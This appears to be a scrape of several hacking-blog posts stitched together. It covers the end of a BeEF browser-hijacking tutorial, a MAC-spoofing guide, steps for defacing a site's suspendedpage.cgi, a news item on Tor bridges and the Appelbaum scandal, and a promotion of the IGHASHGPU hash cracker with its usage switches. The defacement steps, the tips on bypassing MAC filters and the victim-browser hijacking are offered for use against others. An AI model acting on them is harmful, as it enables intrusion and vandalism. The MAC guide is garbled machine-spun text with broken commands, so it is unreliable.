Now that we’ve navigated to our commands tab, we can look through all of the possible commands we can execute on the victim’s browser. Please note that not all of these will work as some of them are circumstance specific. The one we’re after in this instance is the raw javascript module. We can find this module under the “Misc” folder in the commands tab. Let’s select this module now:

We can see that in this module we have a box to enter some JavaScript. In order to see the plugins that the victim has, we’re going to return some information out the the “navigator” object using our code. We’re also going to make an alert box appear in the victim’s browser, just for fun. Let’s take a look at this code now:

Now that we have entered our code to execute, we simply need to press the “execute” button on the bottom right of the BeEF page. Once we do this, we should see the JavaScript return an array containing the currently installed plugins. Let’s execute our code and see the results now:

Here can see a list of all the plugins that the victim has installed on their browser! We could look deeper and see if there any exploitable vulnerabilities in these plugins, but that’s best discussed later. Now that we have our results, let’s move back to the victim and take a look at our alert box!

There we have it! We were not only able to successfully hijack our victim’s browser, but we were able to extract information from it that could open a future avenue for attack! As we’ve demonstrated here today, browser hijacking can be extremely useful to any hacker looking for a way into a system. Not only is it good for finding the vulnerabilities, but in some cases we can use it to exploit them as well. That’s all for the introduction to hijacking with BeEF. In the next article, we’ll be taking a closer look at social engineering with BeEF, and how we can use it to steal credentials from the user

HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY)

MAC (Media Access Control) is a number that identifies your network adapter or adapters for connecting to the internet. To remain exceptionally anonymous you must change your MAC IP address. By changing your macintosh address you can:

• Staying Anonymous
• Bypass Mac Filters
• Mac Authentication

#1 Staying Anonymous :

The first and the chief thing by ridiculing your macintosh location is with the end goal of namelessness. Your macintosh location can be seen by any individual on your neighborhood (LAN) or besides in the event that you are associated with a WiFi system any individual can see your macintosh address by simply running a basic sweep either from windows or Linux. A basic sample of this is to simply utilize the order from Linux as

The BSSID’s recorded over allude’s to the macintosh addresses for different systems accessible in your reach. By simply running a straightforward sweep we discover the different BSSID’s accessible. Programmers may attempted to misuse your system in the event that they figured out your macintosh address and can utilize the web as being “you” That’s the reason you have to change your MAC address.

#2 Bypassing MAC Filters :

If you ever need to unite with an open WiFi system with the end goal of staying unknown however things didn’t turned out really well, may be the WiFi proprietor is utilizing a MAC channel. Macintosh channel implies just permitting those clients to interface which have a particular MAC address. By changing your MAC location to that particular location which is joined you can associate with a system yet first by de validating the present client.

#3 MAC Authentication :

Some ISP (Internet Service Provide) might just permit you to interface with a MAC address in the event that you have a particular location. So changing your location dependably helps for this situation.

HOW TO CHANGE YOUR MAC ADDRESS

1. Smac ( For Windows) :- It is an effective MAC changer that has been around for a considerable length of time. It is anything but difficult to use with any equipment. You should be a “specialist” to utilize this. It totally parodies your Mac address. Rather than utilizing Smac there are numerous product’s accessible which you can use to change your PC’s macintosh location thus on stay unknown on the web.

You can download it by clicking Here

2. Macintosh Changer (Linux) :- Mac-changer is a free accessible apparatus which is utilized for changing the Mac address in a Linux machine. What you have to do is select your web interface and run the summon and its basically done.

The above screenshot is taken from Backtrack and it is unreservedly accessible in Backtrack and numerous other higher adaptations.

sudo well-suited get introduce macchanger-gtk 

Thanks for Reading

How to deface suspendedpage.cgi: Today in this article we will discuss about How to deface suspendedpage.cgi. You might have landed to this suspendedpage.cgi page by mistake and ignored it but we can deface it.  Its very simple How to deface suspendedpage.cgi all you have to do is to follow the steps given below
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi. So we are discussing here about to deface suspendedpage.cgi. all you have to do is uts to convert your deface page’s html coding to .cgi script and upload it in /cgi-bin/ or /cgi-sys/ directories . Just follow the steps

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi. Just follow the simple steps given below How to deface suspendedpage.cgi

• Go HERE and convert your deface.html to .cgi script
• Save it as suspendedpage.cgi
• And finally upload it in the /cgi-bin/ or /cgi-sys/ directories
• When you have uploded it, change the chmod from suspendedpage.cgi to 755.
• Save and see the result
  Example: www.site.com/cgi-sys/suspendedpage.cgi
• BOOM!! You have DEFACED suspendedpage.cgi page

So that’s it If you have any doubts feel free to ask

Censorship is nothing new, but as many governments and law enforcement agencies tighten the noose, anti-surveillance solutions need to get creative.

The Tor Project, which runs the anti-surveillance Tor network, is one such being.

The non-profit runs a network designed to disguise the original locations of users through traffic and relay points, and is often used by journalists, activists, and those attempting to circumvent censorship.

Nima Fatemi, an independent security research and member of the Tor Project, highlighted in a recent blog post how users in countries such as China, Saudi Arabia, and Iran can still try to access the network.

As noted by Motherboard, governments including Saudi Arabia, Bahrain, Iran, Russia, and China often attempt to block the use of virtual private networks (VPNs) in an effort to keep an eye on their citizen’s online activities.

However, blocking Tor is a more complicated problem due to the use of volunteer-ran nodes and relays used to reroute traffic and disguise original IP addresses.

According to Fatemi, the Tor Browser spoofs the UserAgent identity feature to make users look alike and avoid spying, as well as fingerprint attacks. However, Tor is still an open network where anyone can get a list of relay points — and so governments can simply block them.

“They can simply get the list of Tor relays and block them,” Fatemi noted. “This bars millions of people from access to free information, often including those who need it most. We at Tor care about freedom of access to information and strongly oppose censorship.”

As a result, Tor has developed what the organization called Pluggable Transports (PTs). PTs are a type of “bridge” into the Tor network which “make encrypted traffic to Tor look like not-interesting or garbage traffic,” according to the developer.

If users already want to try out this censorship-thwarting tool, they are in luck — as PTs are already included in the Tor Browser.

Tor has provided a step-by-step guide, as shown in the image below:

If you need additional bridges, you can email the project here or visit the BridgeDB website.

Tor has hit the spotlight recently after a scandal involving one of the “core” members of the project’s development team rocked the very foundations of the organization. Jacob Appelbaum, a 33-year-old developer, stepped down from his position after being accused ofalleged inappropriate sexual misconduct.

While Appelbaum has denied the claim as a “calculated and targeted attack,” an investigation conducted by an external law firm found that “many people inside and outside the Tor Project have reported incidents of being humiliated, intimidated, bullied, and frightened by Jacob,” according to Tor executive director Shari Steele.

As a result of the scandal, the full Tor board has been replaced with new faces including security expert Bruce Schneier, executive director of the Electronic Frontier Foundation (EFF) Cindy Cohn, and Matt Blaze, a computer and information science professor at the University of Pennsylvania.

IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.

It even works with salted hashes making it useful for MS-SQL, Oracle 11g, NTLM passwords and others than use salts.

IGHASHGPU is meant to function with ATI RV 7X0 and 8X0 cards, as well as any nVidia CUDA video cards, providing a variable speed in accordance with the users GPU. The program also features a ‘-cpudontcare’ command that allows you to tell IGHASHGPU that it can use the maximum level of GPU, without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for tracking your hardware (’-hm’), so you can make sure to desist any activity that causes your system to go over the permitted value (the default is 90 degrees Celsius).

It also has a feature that lets you set the block size so as to adjust the video response time and reduce any possible lags; if on the other hand, this is a characteristic that does not bother you in any particular way, you can input a higher value (as IGHASHGPU supports block sizes ranging between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

• Plain MD4, MD5, SHA1.
• NTLM
• Domain Cached Credentials
• Oracle 11g
• MySQL5
• MSSQL
• vBulletin
• Invision Power Board

Supported Cards/Requirements

• Only currently supported ATI cards are:
  • HD RV7X0
  • RV830/870
  • 4550
  • 4670
  • 4830
  • 4730
  • 4770
  • 4850
  • 4870
  • 4890
  • 5750
  • 5770
  • 5850
  • 5870
• Catalyst 9.9+ must be installed.
• Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
• Systems with multiple GPUs supported.

  ighashgpu.exe [switch:param] [hashfile.txt]
   
  -c             csdepa Charset definition (caps, smalls (default), digits, special, space, all)
  -u             [chars] User-defined characters
  -uh           [HEX] User-defined characters in HEX (2 chars each)
  -uhh         [HEX] User-defined characters in Unicode HEX (4 chars each)
  -uf            [filename] Load characters from file. Not used with Unicode.
  -sf            [password] Password to start attack from
  -m           [mask] Password mask
  -ms         [symbol] Mask symbol
  -salt        [hex] Append salt after password
  -asalt      [string] Append salt in ascii after password
  -usalt      [string] Append salt in unicode after password
  -ulsalt     [string] Same as above but unicode string firstly transformed to lower case
  -min       [value] Minimum length (default == 4), must be >= 4
  -max      [value] Maximum length (default == 6), must be <= 31 (not counting salt length)
  -h           [hash] Hash to attack (16 or 20 bytes in HEX)
  -t            [type] Type of hash to attack
  -devicemask:[N] Bit mask for GPUs usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs). 
  -cpudontcare Tell ighashgpu that you want maximum from GPU and so don't care about CPU usage at all (and it means one CPU core at 100% per one GPU).
  -hm               [N] Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
  -blocksize     [N] Set block size, by default N = 23 which means 2^23 = 8388608 passwords offloaded to GPU in a single batch.
   
  By default charset processed as ANSI one. (i.e. WideCharToMultiByte(CP_ACP, ...) You can change this with: 
   
  -unicode  Use unicode
  -oem        Use oem encoding
  -codepage  [page] Convert charset to specific codepage (need to have it at system of course
  

   

  You can download IGHASHGPU here:

  ighashgpu_v0.80.16.1.zip